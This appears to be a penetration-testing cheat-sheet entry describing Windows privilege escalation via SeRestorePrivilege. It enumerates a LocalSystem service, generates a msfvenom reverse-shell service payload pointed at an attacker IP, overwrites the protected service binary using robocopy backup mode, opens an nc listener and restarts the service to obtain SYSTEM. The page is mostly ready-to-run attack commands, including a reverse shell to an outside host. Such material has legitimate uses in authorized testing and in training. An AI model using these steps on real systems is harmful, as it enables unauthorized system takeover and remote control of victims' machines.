Protected service binary replacement uses SeRestorePrivilege to write over a service executable that normal ACLs would protect.
The primitive is restore-based file write into a privileged execution path. If the service runs as LocalSystem, the next service start can execute the replacement binary as SYSTEM.
When enumerating protected service binary replacement opportunities, try to identify:
SeRestorePrivilegein the current token- Service binary path
- Service account context
- Service restart ability
- Original binary backup path
- Whether backup-mode copy writes into the protected directory
Enumeration
Inspect the service:
sc qc <ServiceName>
Check file owner and ACL:
dir /q "C:\Path\To\Service.exe"
icacls "C:\Path\To\Service.exe"
Interesting findings include:
- Service runs as
LocalSystem - Normal write access is blocked
- Restore semantics can write the file
- Service can be restarted or will restart on reboot
Once the target and trigger are confirmed, stage a service-compatible payload.
Exploit
- Preserve the original binary if the current context can read it. If not, record the path, service configuration, and file metadata before continuing.
copy "C:\Path\To\Service.exe" "C:\Users\Public\Service.exe.bak"
- Generate a service-compatible payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9443 -f exe-service -o Service.exe
- Stage it in a writable directory.
mkdir C:\Users\Public\restore
copy Service.exe C:\Users\Public\restore\Service.exe
- Use Robocopy in backup mode to restore into the protected location:
robocopy /B C:\Users\Public\restore "C:\Path\To" Service.exe
- Start a listener.
nc -lnvp 9443
- Restart the service.
sc stop <ServiceName>
sc start <ServiceName>
- Verify the resulting context.
whoami
whoami /priv